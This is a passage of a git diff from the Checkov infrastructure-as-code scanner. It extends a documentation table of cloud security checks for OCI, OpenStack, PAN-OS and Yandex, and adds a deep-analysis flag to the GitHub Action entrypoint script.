[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2039 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | +| 2040 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | +| 2041 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | +| 2042 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | +| 2043 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | +| 2044 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | +| 2045 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2046 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2047 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2048 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2049 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | +| 2050 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | +| 2051 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | +| 2052 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | +| 2053 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | +| 2054 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2055 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2056 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2057 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2058 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2059 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2060 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2061 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2062 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2063 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2064 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2065 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2066 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2067 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2068 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2069 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2070 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2071 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2072 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2073 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2074 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2075 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2076 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2077 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2078 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2079 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 2080 | CKV_TF_2 | module | module | Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 2081 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2082 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2083 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2084 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2085 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2086 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2087 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2088 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2089 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2090 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 2091 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 2092 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 2093 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 2094 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 2095 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 2096 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 2097 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 2098 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 2099 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 2100 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2101 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2102 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2103 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2104 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2105 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2106 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2107 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2108 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2109 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2110 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 2111 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 2112 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 2113 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 2114 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 2115 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 2116 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 2117 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2118 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2119 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 2120 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2121 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2122 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2123 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2124 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2125 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2126 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2127 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | --- diff --git a/github_action_resources/entrypoint.sh b/github_action_resources/entrypoint.sh index a9072eacf14..59a9c5c0f74 100755 --- a/github_action_resources/entrypoint.sh +++ b/github_action_resources/entrypoint.sh @@ -68,6 +68,10 @@ if [ -n "$INPUT_SKIP_DOWNLOAD" ] && [ "$INPUT_SKIP_DOWNLOAD" = "true" ]; then SKIP_DOWNLOAD_FLAG="--skip-download" fi +if [ -n "$INPUT_DEEP_ANALYSIS" ] && [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then + INPUT_DEEP_ANALYSIS_FLAG="--deep-analysis" +fi + if [ -n "$INPUT_LOG_LEVEL" ]; then export LOG_LEVEL=$INPUT_LOG_LEVEL fi @@ -196,11 +200,11 @@ else fi # Build command if [ -n "$API_KEY_VARIABLE" ]; then - echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG" - CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG) + echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG" + CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG 